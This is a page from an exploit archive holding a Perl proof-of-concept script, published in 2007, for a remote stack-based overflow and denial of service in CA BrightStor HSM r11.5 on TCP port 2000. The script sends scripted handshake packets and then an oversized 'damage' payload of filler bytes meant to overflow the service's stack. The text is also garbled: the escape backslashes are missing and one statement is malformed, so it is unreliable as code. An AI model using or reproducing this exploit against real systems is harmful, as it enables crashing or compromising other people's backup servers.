[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS
# Published : 2007-10-27
# Author : Nice Name Crew
# Previous Title : Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
# Next Title : DNS Recursion bandwidth amplification Denial of Service PoC
#!/usr/bin/perl
#
# *
# * C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o
# * C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@o
# * C@@@@@@o .8@@@@@@. C@@@@@@o 8@@@@@@. @@@@@@O .@@o
# * C@@@@@ @@@@@@c C@@@@@ @@@@@@c C@@@@@c
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: @@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: 8@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: :@@@@@@ ::
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: c@@@@@@@Coo8@@@o
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: C@@@@@@@@@@@@o
# *
# * [0x00001010]
# *
# * Title: CA BrightStor HSM <= r11.5 Remote Stack Based Overflow / DoS
# * For: Windows XP (SP2 Professional) / Windows Server 2003 (Enterprise Edition)
# * Released by: NiceNameCrew [http://nnc.unkn0wn.eu]
# * Author: boecke <boecke@herzeleid.net>
# * Discovery: iDefense
# * Vulnerability Type: Remote Stack Overflow / DoS
# * Risk: High
# * TCP: 2000
# *
# * This body, this body holding me, be my reminder here that I am not alone.
# *
#
use IO::Socket;
$handshake =
"x14x00x00x00" . # [0x14000000] INIT_BEGIN
"x42x00x00x00" . # [0x42000000] FX_SET_CONSOLE_CREDENTIALS
"x07x00x00x00" . # [0x07000000] GUI_FLAGS
"x00x00x00x00x00x00x00x00"; # [0x00000000] END
# 0030 ff d1 7b ef 00 00 14 00 00 00 44 00 00 00 07 00 ..{..... ..D.....
# 0040 00 00 00 00 00 00 00 00 00 00 ........ ..
$handshake_auth =
"x14x00x00x00x44x00x00x00x07x00x00x00" .
"x00x00x00x00x00x00x00x00";
$handshake_auth2 =
"x14x00x00x00x03x00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x08x00x00x00";
$handshake_auth3 =
"x14x00x00x00x32x00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x1Cx00x00x00";
$handshake_auth4 =
"x14x00x00x00x1Cx00x00x00" .
"x07x00x00x00x00x00x00x00x00x00x00x00";
# List Network Locations
$drives =
"x14x00x00x00x0Fx00x00x00x07x00x00x00x00x00x00x00x00x00x00x00";
# List Computers on Network (MSHOME)
$computers =
"x1Ax00x00x00" .
"x27x00x00x00" .
"x07x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"x4Dx53x48x4Fx4Dx45" (MSHOME)
$damage =
"x40x05x00x00x1Dx00x00x00" .
"x07x00x00x00x00x00x00x00" .
"x00x00x00x00" .
"x41" x 1232 .
"BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK" .
"LLLLMMMMNNNNOOOOLOLO" .
"x41x42x43x44" .
"RRRRSSSSTTTTUUUU" .
"VVVVWWWW" .
"x2Ex41x3B" .
"x00x00x00x00x00x00";
if ( $socket = IO::Socket::INET->new( PeerAddr => "127.0.0.1", PeerPort => "2000", Proto => "TCP" ))
{
print $socket $handshake;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth2;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth3;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $handshake_auth4;
recv($socket, $reply, 256, 0);
print($reply . "n");
print $socket $damage;
recv($socket, $reply, 256, 0);
print($reply . "n");
}
# www.Syue.com [2007-10-27]